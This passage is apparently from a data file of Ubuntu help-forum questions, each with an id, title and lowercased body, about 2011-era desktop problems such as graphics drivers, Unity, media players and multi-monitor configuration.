51/40:08:08:03:00/00:00:00:00:00/e0 emask 0x9 ( media error ) ata4.00 : status : { drdy err } ata4.00 : error : { unc } ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 ata4.00 : bmdma stat 0x25 ata4.00 : failed comand : read dma ata4.00 : cmd c8/00:08:00:03:00/00:00:00:00:00/e0 tag 0 dma 4096 in res 51/40:08:08:03:00/00:00:00:00:00/e0 emask 0x9 ( media error ) ata4.00 : status : { drdy err } ata4.00 : error : { unc } end_request : i/o error , dev sdb , sector 784
43709	how do i remove all files that match a pattern ?	when i revert in mercurial , it leaves several .orig files . i would like to be able to run a command to remove all of them . i have found some sources that say to run : rm **/*.orig but that gives me the message : rm : can not remove `*/.orig ' : no such file or directory i have also tried : rm -rv *.orig rm -r *\.orig
43716	how do i get `` quickly '' to use git ?	how do i get quickly to use git as its default version control instead of bazaar ?
43718	how do i access a hard drive from a live cd ?	how can i access my hard drive from a live cd ? as far as i can tell the hard drive can only be accessed via /media/longnumberhere after its been mounted . is there a way to access the hard drive a drive instead ? ( so it can be accessed by /dev/hda )
43720	is there a music player that does n't play video or show photos ?	i want a music player that ca n't play video or show photos . i do n't have any other requirements . are there any music players that fit my description ?
43724	required password and username on auto eth0 connection	i have the auto eth0 connection . with windows users will create a new connection and type password and username , but in ubuntu how i can do it ? previously , when i connected to wired connection ( auto eth0 ) , it was not like now , because i do n't need user/password , but now i should put user/password because it will not work . in my city they do not know what is linux , so they ignore that some people like me may have linux os . thanks .
43726	hardware error pindown	fresh 11.04 , ff crashes every minute , applications refuses to start . memtest say ram is ok , segfaults often ( apt-get ) found bad charachters in some files , still fsck reported only one error . mb ( gigabyte h55n ) bios settings to `` safe '' . is it mb or hd ? how to find out ? ( s.m.a.r.t say everything 's fine ) regards , /t
43734	how to show the mounted disc title in the unity ?	hello . if the system has several mounted devices - they will all be displayed on the launcher panel , but without captions ( titles ? ) . it make difficult to know which icon is responsible for a which drive . only tip can help , but it shows a very long time . maybe there 's a way to include displaying the disk label on launcher panel ? thanks . p.s . sorry , please , for my bad english . i just learn it and accept any corrections ; )
43736	nautilus not working in gnome 3	i have 11.04 installed with gnome3 , it was working perfectly . however now i am getting a strange behavior . when ubuntu starts up i have no desktop . if i click the `` files '' icon in the sidebar i get nothing happening ( no file browser ) . however once i do a search for anything that shows up under `` places '' then the file browser opens and my desktop starts showing . what could be causing this ?
43738	why does nvidia settings have different resolutions than the monitor option ?	i checked the resolutions in system - > preferences - > monitors and it has different resolutions than the system - > administration - > nvidia x server settings i have installed the proprietary nvidia drivers from the additional drivers options ( jockey-gtk ) version 270.41.06 now my question is why the difference and how can i ( if possible ) make them the same )
43739	how can i add the nvidia x settings to the panel ?	is it possible to add the nvidia x settings to the panel so it can be worked from there ? for example to have the ability to change resolutions , change aa , af , vsync , detect other monitors , change refresh rate , etc..
43741	is ubuntu planning to have something similar to akonadi ?	does ubuntu have plans to integrate akonadi or a similar functionality in future ( wikipedia - akonadi ) ?
43742	11.04 unable to read dvds and cds burned in 11.04 ?	i 'm noticing all of my computers with natty can not read dvds that i have burned using natty . does anyone else have this problem ? i can put the dvd or cd into a maverick system and it will read the disc . but natty systems i have can not read anything i 've burned using natty .
43743	sshfs hangs during file copy	i use sshfs to handle transfers between servers , but have been running into problems since installing 11.04 . i 'm not sure if the problem at this point is in my wireless driver ( atheros 9285 ) or ssh/sshfs . my wireless does work fine other than when transferring across sshfs , but when i copy a large file across sshfs , it copies several mbs , then hangs . i can actually get it to restart by disconnecting and reconnecting my wireless network through network manager . several other things stop when it hangs as well , like the monitor panel applet . the machine i 'm copying to still runs 10.04 . i see no messages in the dmesg logs.i 've seen a couple of references to problems in natty for both the atheros cards , and ssh/sshd . i 've installed the wireless backports , but see no difference . does anyone have any ideas about what the problem could be ?
43749	how to find run time of a program from commmand line ?	i just ran a program and wish to know how much time it took to execute it . how do i do it ?
43755	how to select in what monitor youtube fullscreens ?	i have a dual monitor set-up . when i 'm at youtube , and i click the fullscreen-icon , the fullscreen automatically goes to the second window . how do i get it to go fullscreen on my main monitor ?
43759	what program should i use to manage an ipod shuffle ( 4g ) ?	i have a nano which i barely ever download anything to and have n't done so recently . i use it mainly for music . i also have the 4g ipod shuffle and that is the thing i have trouble with . i have tried to download music to it through banshee and that works fine . however podcasts wo n't download through banshee . when i download through rhythmbox i can download the podcast , but it destroys the voice over kit . i have tried gtkpod and that works for nothing and always ruins the ipod voice over kit . so my question is what media player that will download podcast is the most compatible with the ipod shuffle 4g ? i am currently downloading and trying ump .
43761	mouse settings not restored after disconnecting external mouse	i have a dell inspiron 1545 with ubuntu 11.04 . when a connect an external mouse and then disconnect it , the cursor ( using the touchpad ) gets very slow . to fix it , i have to go to gpointing device settings- > alpsps/2 alps glidepoint- > speed and modify a bit the settings to obtain a faster cursor . that happens every time i disconnect the external mouse . is there a way to maintain the same settings ? by the way , gpointing device settings is what i get by opening the application `` poiting devices '' . this is the screenshot of the settings : update : actually , the settings are reset to the start configuration when i restart the operative system . thanks in advance .
43763	tool to convert a sequence of numbered png files to an animated gif ?	i 've created a series of small png files using blender and i was wondering if there was a tool ( preferably in the repos . ) that would convert them to an animated gif . one extra stipulation : the tool needs to also be able to set the background color of the gif to a specified color since the png files have an alpha channel and i do n't want the gif to be transparent .
43764	how do i get turbo boost working ?	i have a hp pavilion dv6-2190us notebook , its got 8gb ddr3 and an i7 processor with 1.60ghz ( turbo boost up to 2.80ghz ) i 'm not sure if i 'm doing something wrong or missing step or what but i ca n't for the life of me figure out how to get the turbo boost working . it 's a real pain because 8x 1.6ghz really sucks , i 'm starting to wish i had an i5 with less cores but more clock speed per core ... is there anything i can do either enable speed step/turbo boost or maybe just keep it overclocked all the time ? oh , i 'm running ubuntu 10.10 64-bit . thanks ! edit i followed the procure here but my results do n't change at all when i execute the loop . cpu mhz : 1600.000 cpu mhz : 1600.000 cpu mhz : 1600.000 cpu mhz : 1600.000 cpu mhz : 1600.000 cpu mhz : 1600.000 cpu mhz : 1600.000 cpu mhz : 1600.000
43771	accessing an ubuntu share from mac os x ( snow leopard )	i have an external hard drive hooked up to my desktop running ubuntu . i 've shared the folder by simply right-clicking , going to sharing options , and clicking on 'share this folder ' . how can i access this share from my mac laptop ? it does n't show up in the network folder , and i tried smb : //ip_address/ with no success .
43776	does an upgrade to a partition format get applied to an already existing partition ?	i have often wondered , when an update is made to ext4 for example in the kernel and then more performance updates are made to it ( and they keep up adding up over time ) when i upgrade to the latest ubuntu version , do they get applied to an already internal hard drive that is using ext4 already since 10.04 . i have 2 hard drives with ext4 which i formatted a year ago . do this performance or fixes in the kernel need a reformat to the hard drives or do the ext4 partitions need nothing more than just to connect to the new kernel . what is the actual difference between formatting in an old ubuntu version using an old ext4 version versus formatting a new hard drive with a new shiny ubuntu . am using ext4 as an example but any other partition format applies that has received updates with the release of newer kernel versions .
43779	is it possible to unformat an ext4 partition that previously had an ext4 partition on it ?	i was having a moment of distraction and accidentally checked the format option and started formatting an encrypted ext4 home partition with ext4 - losing access to files . i stopped it in the middle of the process when i noticed what it was doing . i was using the mint debian xfce installer which did the formatting . i made an img file via dd of the partition . ( is it possible to work with this and mount this without turning it into an iso ? ) how do i if i can , get it back ? `` no errors '' were reported scanning the partition afterwards with harddrive tool . testdisk maybe ?
43783	dell vostro 1510 trackpad	a week ago i moved totally from windows 7 to ubuntu . i 've been really happy with the transition bar one annoying glitch . my trackpad sometimes works , sometimes does n't . all other hardware including peripherals work flawlessly , including a logitech ball mouse , wacom bamboo pen and touch and wireless logitech keyboard and mouse combo . i ca n't see any pattern to when and why the trackpad works . occasionally on rebooting , it will work , but then i can reboot 10x in a row and it wo n't work , then i leave it a day , then reboot and it works flawlessly . any ideas on a solution or appropriate method for me to deb it ? my knowledge of ubuntu/linux is sketchy at best so i could do with a little help : )
43784	firefox 4 ui icons disappeared after upgrade to 11.04	since upgrading to natty , some of the icons in firefox 4 have stopped showing . speifically , the back , forward , and close tab buttons ( perhaps others ) . this is in gnome 2 . is there a way to get the icons back ?
43786	modification on usb bootable drive	a usb bootable drive discards all modifications made at shutdown . is there a way to save it ? if possible , how will that affect a version installed on to a different hard disk using that usb drive ?
43787	can glade be used with python pygi introspection ?	i once got started on a pygtk and glade tutorial but never finished it . recently i saw that pygtk is being depreciated in favor of using introspection at https : //wiki.ubuntu.com/meetinglogs/appdevweek1104/gobjectintrospection and https : //wiki.ubuntu.com/meetinglogs/appdevweek1104/pygi . i decided to try learning more of python and gtk again using the new way . the pages i linked to seem to show how you would do it if i wanted to make the gui in the code , but i like to use glade . is there a way to do this and still use the new introspection ?
43790	system logs out on video playing in full screen	after upgrading to ubuntu 11.04 , a strange behaviour i am getting on video playing full screen in totem , vlc , smplayer , xine player . the system logs out every time i play a video , almost all video formats i have tried . i have resolved this problem , changing video drivers of the said player to x11 , smplayer : options -- > preferances -- > video -- > output driver -- > x11 ( slow ) vlc : tools -- > preferences -- > video -- > unchecked accelerated video output now the videos are playing on full-screen without logging off . as of totem movie player , could n't find this option , how to change . however , this seems odd , that i have not noticed this thing in previous versions of ubuntu i have used . here , i want to know how to change/configure the video driver option in totem movie player ... ?
43793	how do i add netbeans to the unity launcher ?	i have installed netbeans 7.0 manually , because only 6.9 is available in ubuntu software center . i tried to keep it in launcher , but after system restart it 's gone . how can i permanently add it ?
43799	how do i get compiz , emerald , and gnome to work ?	i used to run ubuntu 10.10 on my desktop computer , and i had all sorts of settings configured as i liked . i had to do a fresh install of ubuntu 11.04 , so i lost those settings , but it does n't seem to matter , because , from what i understand , emerald support is now either non-existant or shaky , the new version of compiz is incompatible with previous settings , and ubuntu is putting its efforts into unity , not gnome . anyway , the point is , i would like to get back to something like what i had before : compiz , emerald , and gnome . i 'm running ubuntu `` classic '' , so i have gnome . i 've got compiz running , though it seems to crash after every adjustment to the settings . but i do n't have window frames . if i select metacity as the window manager , most compiz effects do n't work . if i select emerald , i simply get nothing . in my emerald themes settings , there are no more themes anymore , and i ca n't find them in synaptic . so ... what 's the deal with emerald ? is there something to replace it ? is this a problem that can be solved without having to build anything from source ?
43800	on- board sound card not recogized	after installing ubuntu 11.04 system does not recognize on-board realtek ac95 sound . also have windows 7 on separate disk which recognizes sound ok . please advise .
43803	game real-time modification utility ?	well , i do n't know how native english call it , in china , we call it `` 游戏克星 '' . something like game buster , game master , fpe ( fix people expert ) , etc . but they only run in win32 . it should be capable of : analyze memory to find out which bytes are used by life-point , energy-point , etc. , and change them ( when the game is running ) . save/restore memory snapshot , so i can resume the game at any time . ( most games only allow you to save at specific save point )
43805	help with implementing usb_modeswitch	anyone know how to configure usb_modeswitch ? i have read the documentation and did not find it very useful . i have the following device : oshirowanen @ laptop : ~ $ lsusb bus 001 device 003 : id 19d2:0031 onda communication s.p.a. zte mf636 i am using ubuntu 10.04.2 . basically , i do n't want the device to be recognised as a usb storage device . i am having to manually eject the device before it automatically gets recognised as a usb broadband modem .
43807	how do i find out where in /dev my microphone audio input is going ?	my microphone works properly ( using the sound control panel , it shows bars when i talk , and it works with google talk , etc ) . now i want to use it for xvidcap , and it needs a file to read the audio input from . i tried /dev/dsp and /dev/snd as guesses , but they do n't work . how do i tell for certain where my audio input is going ?
43808	how do i use lightdm with gnome3 ?	i just installed gnome3 following the steps from another question sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install gnome-shell then installed lightdm , tried starting it and got a blank screen , what did i do wrong ? sudo apt-get install lightdm sudo lightdm then blank screen ( is this normal ? ) ... restarted ( using power button , is this blank screen normal ? ) , selected ubuntu gnome shell desktop got `` failed to load sesson gnome '' tried ubuntu and got `` failed to load session ubuntu '' ... this is a fresh install of ubuntu 11.04 server on virtual box .
43810	how do i make software center to open the apt-urls in firefox ?	how do i make apt-urls like this open in the software center ?
43811	maximized windows stop repaint when loosing focus	i have a very annoying problem . when i maximize a window and than i change the focus to another window with alt+tab or by clicking it , when i go back to the first maximized window it stops to repaint . it means that window is still alive , i can understand it looking at the window title which is still changing but the only way i found to make the content window restart repainting itself is to detach it from maximize . at this point it works again . i 'm using ubuntu 11.04 with unity with an ati radeon hd4500 with propriertary drivers .
43814	banshee is working very slow	banshee is working on my pc very slow . my pc should have enough power ( 2x3ghz , 4gb-ram , 7gb-swap , 1gb-graphics , 32bit ubuntu ) but the switching between playlists is working very low . default version of banshee ( not a ppa-version ) ~4000 music files on raid-1 ext4-partition 49 % +32 % cpu-usage while switching playlist or album 50 % cpu-usage while scrolling album view a debug did n't show me why banshee is working such slow . while i am switching between the playlists or selecting an album ( takes nearly 2 seconds ) nothing is shown on terminal . tvn @ main : ~ $ banshee -- debug ** running mono with -- debug ** [ 1 info 17:37:52.783 ] running banshee 2.0.0 : [ ubuntu natty ( development branch ) ( linux-gnu , i686 ) @ 2011-04-18 16:21:33 utc ] [ 1 debug 17:37:52.800 ] initializing gtk [ 1 debug 17:37:54.154 ] post-initializing gtk [ 1 debug 17:37:54.164 ] configuration client extension loaded ( banshee.gnomebackend.gconfconfigurationclient ) [ 1 debug 17:37:54.181 ] using default gconf-base-key [ 1 debug 17:37:54.221 ] bus.session.requestname ( 'org.bansheeproject.banshee ' ) replied with primaryowner [ 1 debug 17:37:54.290 ] core service started ( dbusservicemanager , 0,001209 ) [ 1 debug 17:37:54.293 ] registering remote object /org/bansheeproject/banshee/dbuscommandservice ( banshee.servicestack.dbuscommandservice ) on org.bansheeproject.banshee [ 1 debug 17:37:54.302 ] core service started ( dbuscommandservice , 0,011063 ) [ 1 debug 17:37:54.336 ] opened sqlite ( version 3.7.4 ) connection to /home/tvn/.config/banshee-1/banshee.db [ 1 debug 17:37:54.337 ] core service started ( dbconnection , 0,034676 ) [ 1 debug 17:37:54.344 ] database version 43 is up to date [ 1 debug 17:37:54.374 ] core service started ( preferenceservice , 0,013099 ) [ 1 debug 17:37:54.381 ] core service started ( network , 0,007064 ) [ 1 debug 17:37:54.382 ] registering remote object /org/bansheeproject/banshee/sourcemanager ( banshee.sources.sourcemanager ) on org.bansheeproject.banshee [ 1 debug 17:37:54.382 ] core service started ( sourcemanager , 0,000638 ) [ 1 debug 17:37:54.390 ] core service started ( mediaprofilemanager , 0,000229 ) [ 1 debug 17:37:54.393 ] registering remote object /org/bansheeproject/banshee/playerengine ( banshee.mediaengine.playerengineservice ) on org.bansheeproject.banshee [ 1 debug 17:37:54.397 ] core service started ( playerengine , 0,007314 ) [ 1 debug 17:37:54.411 ] registering remote object /org/bansheeproject/banshee/playbackcontroller ( banshee.playbackcontroller.playbackcontrollerservice ) on org.bansheeproject.banshee [ 1 debug 17:37:54.412 ] core service started ( playbackcontroller , 0,002727 ) [ 1 debug 17:37:54.419 ] starting - startup job [ 1 debug 17:37:54.420 ] core service started ( jobscheduler , 0,007892 ) [ 1 debug 17:37:54.432 ] io provider extension loaded ( banshee.io.gio.provider ) [ 1 debug 17:37:54.463 ] loaded hardwaremanager backend : banshee.hardware.gio [ 1 debug 17:37:54.464 ] core service started ( hardwaremanager , 0,044113 ) [ 1 debug 17:37:54.467 ] bus.session.requestname ( 'org.bansheeproject.collectionindexer ' ) replied with primaryowner [ 1 debug 17:37:54.468 ] registering remote object /org/bansheeproject/banshee/collectionindexerservice ( banshee.collection.indexer.collectionindexerservice ) on org.bansheeproject.collectionindexer [ 1 debug 17:37:54.470 ] core service started ( collectionindexerservice , 0,005453 ) [ 1 debug 17:37:54.472 ] core service started ( savetrackmetadataservice , 0,001513 ) [ 1 debug 17:37:54.480 ] adding icon theme search path : /usr/share/banshee/icons [ 1 debug 17:37:54.481 ] core service started ( gtkelementsservice , 0,009158 ) [ 1 debug 17:37:54.482 ] core service started ( interfaceactionservice , 0,001539 ) [ 1 debug 17:37:54.554 ] registering remote object /org/bansheeproject/banshee/globaluiactions ( banshee.gui.globalactions ) on org.bansheeproject.banshee [ 1 debug 17:37:54.555 ] album artwork path set to /home/tvn/.cache/media-art [ 1 debug 17:37:54.577 ] core service started ( artworkmanager , 0,023272 ) [ 1 debug 17:37:54.577 ] core service started ( bookmarksservice , 0,000135 ) [ 1 debug 17:37:55.046 ] constructed nereid interface : 0,402973 [ 1 debug 17:37:55.139 ] creating new surface cache for 90px images , capped at 0,65 mib ( 21 items ) [ 1 debug 17:37:55.198 ] registering remote object /org/bansheeproject/banshee/clientwindow ( nereid.playerinterface ) on org.bansheeproject.banshee [ 1 debug 17:37:55.198 ] core service started ( nereidplayerinterface , 0,576714 ) [ 1 debug 17:37:55.220 ] extension service started ( gstreamercoreservice , 0,020599 ) [ 1 debug 17:37:55.227 ] extension service started ( podcastservice , 0,002593 ) [ 1 debug 17:37:55.228 ] extension service started ( dapservice , 0,001135 ) [ 1 info 17:37:55.232 ] updating web proxy from gconf [ 1 debug 17:37:55.236 ] direct connection , no proxy in use [ 1 debug 17:37:55.251 ] extension service started ( gnomeservice , 0,022906 ) [ 1 debug 17:37:55.253 ] extension service started ( coverartservice , 0,001967 ) [ 1 info 17:37:55.254 ] all services are started 1,032338 [ 1 debug 17:37:55.673 ] creating pango.layout , configuring cairo.context [ 1 debug 17:37:55.993 ] extension source loaded : jetzt wiedergegeben [ 1 debug 17:37:55.997 ] extension source loaded : miro guide [ 1 debug 17:37:56.018 ] extension source loaded : hăśrbăźcher [ 1 debug 17:37:56.022 ] starting gtk main loop [ 1 debug 17:37:56.267 ] creating pango.layout , configuring cairo.context [ 1 debug 17:37:56.340 ] creating pango.layout , configuring cairo.context [ 1 info 17:37:56.471 ] nereid client started [ 1 debug 17:37:56.474 ] delayed initializating banshee.mediaengine.playerengineservice [ 1 debug 17:37:56.478 ] ( libbanshee : player ) stream volume supported : yes [ 1 debug 17:37:56.480 ] ( libbanshee : player ) audiosink has volume : no [ 1 debug 17:37:56.489 ] ( libbanshee : player ) using system ( gst-plugins-good ) equalizer element [ 1 debug 17:37:56.549 ] player state change : notready - > ready [ 1 debug 17:37:56.554 ] loaded equalizer presets : 0,000173 [ 1 debug 17:37:56.559 ] selected equalizer : rock [ 1 debug 17:37:56.564 ] player state change : ready - > idle [ 1 debug 17:37:56.569 ] ( libbanshee : player ) disabled replaygain [ 1 info 17:37:56.571 ] gstreamer version 0.10.32.0 , gapless : true , replaygain : false [ 1 debug 17:37:56.576 ] delayed initializating banshee.podcasting.podcastservice [ 1 debug 17:37:56.650 ] delayed initializating banshee.dap.dapservice [ 1 debug 17:37:56.656 ] dap support extension loaded : banshee.dap.appledevice [ 2 debug 17:37:56.686 ] refreshing any podcasts that have n't been updated in over an hour [ 1 debug 17:37:57.687 ] finished - startup job [ 1 debug 17:37:57.695 ] starting - alben-cover downloaded [ 3 debug 17:37:57.705 ] finished - alben-cover downloaded [ 1 debug 17:53:01.230 ] starting - metadata written in file [ 4 debug 17:53:01.238 ] finished - metadata written in file
43818	whenever i plugged my monitor to my laptop the display the background image stays in the same resolution	my hp mini is having a problem when plugged into a monitor with high resolution . the problem is the background image stays the same resolution of my laptop which is 1024 x 576 thus leaving blank black portion on the monitor .
43821	why is the default delay for the static application switcher pop up set to 0.2s ?	at first i thought it was just lag . it 's a horrible default setting in my opinion , since when i hold alt+tab , i do n't expect to have to wait . as default , it seems to make my experience less smooth .
43830	how can i export mysql database manually - without phpmyadmin	my phpmyadmin does n't work , i see only white blank page when i open it ( it 's has some issue ) , however , i 'd like to export my project databased manually to another computer . i saw all my databases inside /var/lib/mysql and when i run mysqldump -u username -p databasename > backup.sql using mysqldump for backing-up it freezes up , it does nothing is there another option ?
43831	zeitgeist does not index folders in ntfs partition	i am using synapse + unity dash for searching and it seems that neither of these can index folders i 've accessed in my ntfs partition . i believe this is because zeitgeist does not index folders , and locate ( which synapse uses , i believe ) does not touch my ntfs drive . so in short , is there any way to index my ntfs partition ? in such a way that it is accessible via locate . or perhaps make zeitgeist index folders as well ? as of now , dash gives results from ntfs partition , but there are no folders in the result . on the other hand , locate gives me folders , but only on the native ubuntu partition .
43832	since upgrade to natty , no longer automatically booting from drive at startup	as the subject suggests , i now have to enter the boot menu in bios in order to be able to boot ubuntu . this has happened since i upgraded to natty . is there a way to automatically boot from the correct drive without this manual intervention ? thanks for any help
43834	elasticfox on firefox 4	how are you supposed to install the elasticfox add-on on firefox ( 4.0.1 ) on latest ubuntu ( 11.04 ) ? ( elasticfox is an extension for amazon ec2 management . ) going to tools - > add-ons and searching for it returns nothing . top results for `` install elasticfox firefox 4 '' search are strange links that just throw me back to browser 's home page . apparently people who had it installed before upgrading to firefox 4 have got it working , but how about us who do n't have it yet ?
43836	hamster applet in unr 9.10	how do i add the hamster applet in ubuntu netbook remix ? if i start /usr/lib/hamster-applet/hamster-applet -w it works in a window fine . it is written , i should go on the panel and add , but i guess this is not possible in unr ?
43842	purchased applications missing when running in kubuntu	i recently transferred for kubuntu ( needed kde tools to do a job ) and i 'll be on it for a while , but my question is , how do i access my purchased apps through the ubuntu software centre ? there are none listed , and 'reinstall previous purchases ' also shows up with nothing when i log in ; am i missing a component ?
43843	how to open .arc file	i have a contacts.arc file which took from a nokia phone as a back-up of contacts.now my mobile is lost and i want to see some numbers.is there any application to open .arc file in ubuntu ? . i searched in google but did n't get any answer .
43844	bash can not expand backticks interactively	on rhel5.2 ( bash 2.3.25 ) i can cd `pwd`/ [ tab ] and pwd is substituted into my current working directory , using the output of pwd ( 1 ) . how can i achieve the same functionality in ubuntu 9.10 ( bash 4.0.33 ) . i have read previous questions that refer to backticks as being old and deprciated . i did n't know this . i can understand nesting them can be difficult , and i use $ { } is scripts , but i would like to be able to evaluate commands interactively in the shell .
43846	how to put a trigger on a directory	i have a script that scans a directory and does some maintenance on the files in it . another process creates the files in the directory ( 10 - 30 files per day ) . the script is called via a daily cron job . what i need is to trigger the script on an event ( each time a new file is created in the directory ) . i prefer this rather than increasing the frequency of the cron job . how can i do that ? is there a command or a program to install ? thanks in advance for any help .
43855	mouse busy cursor is lost	after a clean install of 11.04 , i do n't see the busy indicator of mouse cursor anymore , except first startup . i have to check the harddisk busy light every time ( for which i have to look under table , which is annoying ) . other cursors are fine . any idea how can i fix this weird situation ?
43861	how do i unmaximize full screen view in virt-manager ?	after activating full screen view for a virtual machine in virt-manager there is no obvious way to un-full screen . any ideas ?
43863	how to perform a rake task after startup ?	i 'm using rails , and i 'd like to perform a specific rake task on boot . i 've made a shell script like so : cd /path/to/my/app rake db : backup which is symlinked in /etc/rc2.d/ . the problem is that the script is run as root which means it does n't have access to rake ( i 'm using bundler and rvm ) . i 'd like to change to my user for the script , but ca n't work out how to do that successfully . so , is there a way to make this run as my account , or is there a better way to get the rake task run after startup ?
43864	can connect to internet only via proxy	after attempting to use a vpn client ( astrill ) , i can no longer access the internet through my ubuntu installation . the vpn was setup as piece of software , not something to be used through ubuntu settings . its not a network issue , as on the same wifi and wired network both my windows install and other comps can connect and use the network . i can , however , connect to sites via a proxy client running through wine . i 've tried changing proxy settings , but to no avail . i 'm really at a loss and have no idea what i should do , whenever i try to run firefox , i get almost immediately `` unable to connect '' and when i try to update ( sudo apt-get update ) in the terminal , it immediately comes back with can not find . there is n't a moments hesitation , just bam ! ca n't do it !
43867	new to the linux game , need help	i am currently trying to convert my newly purchased laptop to an os that is similar to windows but without all of the other other headaches associated with it . i plan on using the laptop for surfing and business purposes only , since i have my playstation for my gaming purposes . can you please recommend an os that would fit my needs ?
43868	so i am not allowed to report a bug against radeon driver because `` natty is complete '' ?	i was thinking about submitting three different bug reports for all three different graphical glitches i have found so far in ubuntu 11.04 . and now after running ubuntu-bug xserver-xorg-video-radeon i am discouraged to report `` technical problems '' . i feel lost , what am i supposed to do ?
43869	problem with my partitions ?	i needed to split my hard disk into 5 partitions for installing ubuntu 11.04 . the first one ( * ) was for system reserved - 100mb , second ( c ) was the installation of windows 7 , third ( d ) was for my work files , fourth ( e ) was for my multimedia ( pictures , music etc . ) and the last one was for ubuntu 11.04 . after doing so , some warning appeared telling me something about `` ca n't boot ... '' i do n't remember ( stupid of me ) , and after doing so , all partitions got simple volume and not primary partition , even where my operating system is . now when i boot with ubuntu cd , to install , when i want to format the partition i made just for ubuntu , there is none of the previously made partitions for ubuntu installation and swap space , just two partitions - the first 160gb and the second - 150gb . the system is booting correctly and working correctly but it is kind of weird , is there any way to change it to primary partition ? i used easeus partition master home edition to convert them safely , but the option is n't there to use ! ! ! so i have two questions , first : what happened with my partitions and is it worth converting them ? what are the cons and pros about simple and primary partitions ? and the second question : how to install ubuntu 11.04 to another partition like i done so far ( but when i boot with the ubuntu cd i burned ) to recognize the free space or the recently made partitions , not only two like before ( it recognized only two partition , one was c and the second was e ) ? - that is the main problem : p i know this is long question ( 2 questions ) but i 'm really desperate to fix this two problems ...
43870	missing libxmlrpc-c3 dependency while installing boxee	anyone can help me to installing boxee in ubuntu natty 11.04 , there is an error '' dependency is not satisfiable : libxmlrpc-c3 ''
43875	how do i adjust the alt-tab speed ?	alt-tab seems slow , my machine has the proper drivers installed and everything else is fast except alt-tab . setting the plugin to show icons instead of window previews does n't help . is this a bug or is a way to speed this up ?
43877	how to integrate skype into the messaging menu ?	i saw in the latest release of pinguyos that somehow they had skype under the messaging menu . it looked something like this : how did they do this ? right now i have empathy under the messaging menu and skype seperately on the notification area but i 'd like to move skype also under the messaging menu just like in that picture ... how is this done ?
43881	how to get rvm working when run from a startup script	ok , following on from this question , i 'm still having problems getting things working . i 'm doing this : if [ `` $ ( id -nu ) '' ! = 'your_user ' ] ; then exec sudo -hu 'your_user ' $ 0 fi which ruby cd /path/to/my/app rake db : backup the problem is , which ruby is printing /usr/bin/ruby , but when i run it in a normal bash session i get /home/nick/.rvm/rubies/ruby-1.9.2-p136/bin/ruby , because i 'm using rvm . so rake does n't work because it 's working from the wrong ruby installation . any ideas ?
43884	proprietary driver for my laptop k40ab ( ati hd4570 )	i have always used the built-in utility to install the driver for my video card ( hd4570 ) . now running ubuntu 11.04 as a live-cd and updating the repository - the utility does not show the available proprietary drivers . maybe i just need to install ubuntu , or download driver from the video card manufacturer .
43888	print tomboy notes recursively	i 've seen this question on how to print notes from tomboy , and that 's all very well . however , i have a `` root note '' with a contents list of a log book i 've been keeping for a project . the contents list has links to all the log entries , which are in their own separate notes . is there any way i can make tomboy `` traverse '' all these notes and print them for me in one command ? i want the solution to follow all links in each note , but never print the same note more than once ( most of the log entries have a link back to the root entry , creating a loop ... ) . also , i will probably end up printing this to a pdf file anyway , so if there is a way to export the notes in this fashion into a single , human-readable file that does not enable printing directly , that 's ok .
43891	multi monitor setup problems	i have ubuntu 10.04 lts - the lucid lynx . i have until recently been using a nvida graphics card ( nvidia geforce 9800 gt ) with two monitors attached , this all worked fine and dandy . a couple of days ago i bought two new identical lcd monitors for a multi monitor setup and two ati graphics cards ( ati sapphire radeon hd5450 ) . note *all monitors work fine in windows xp , 2k , vista and 7 after i had booted into ubuntu only one display came on , that i kind of expected anyway , then i removed the driver for the nvidia card and downloaded the ati version which gave me the ati catalyst control center - in that only two of the displays were showing the third was disabled and showing unknown driver . i enabled the third monitor that stated `` unkown driver '' and had to reboot , upon reboot none of the displays work . i restarted and booted up into recovery mode and from now that is only what i can get into using a failsafe driver . it seems according to the log that a server is already active for display 0 and i have to remove /tmp/.x0-lock and start again . this is what the log file is saying : fatal server error server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . ( ww ) xf86 closeconsole : kdsetmode failed : bad file descriptor ( ww ) xf86 closeconsole : vt_getmode failed : bad file descriptor ( ww ) xf86 closeconsole : vt_getstate failed : bad file descriptor ddxsiggiveup : closing log i have tried looking at my xorg.config file but unfortunately i have not really got a clue as to how it `` should '' be - i have tried regenerating it using this command from a terminal : sudo dpkg-reconfigure -phigh xserver-xorg but that had no effect so i am currently stuck in failsafe driver mode but two monitors are active but are mirroring each other . i hope that this is not to long - looking back i have been going on a bit ! but i am just trying to explain as much as i can ... i have asked this on linuxquestions but nobody seems to know either or at least i have not had any responses . could some kind soul please help explain what i can do from here ? i would be eternally grateful . chris * update * removing xorg.conf does nothing other than allowing me to use only two monitors - using the command : sudo aticonfig -- initial generates the xorg.conf file below : but does not work either - i just get two monitors ... section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` files '' endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection i have tried using this command from a thread on the ubuntu forums with a question similar to mine : sudo aticonfig -- initial=dual-head -- adapter=all generated xorg.conf file section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 screen `` aticonfig-screen [ 0 ] -1 '' rightof `` aticonfig-screen [ 0 ] -0 '' screen `` aticonfig-screen [ 1 ] -0 '' rightof `` aticonfig-screen [ 0 ] -1 '' screen `` aticonfig-screen [ 1 ] -1 '' rightof `` aticonfig-screen [ 1 ] -0 '' endsection section `` files '' endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` aticonfig-monitor 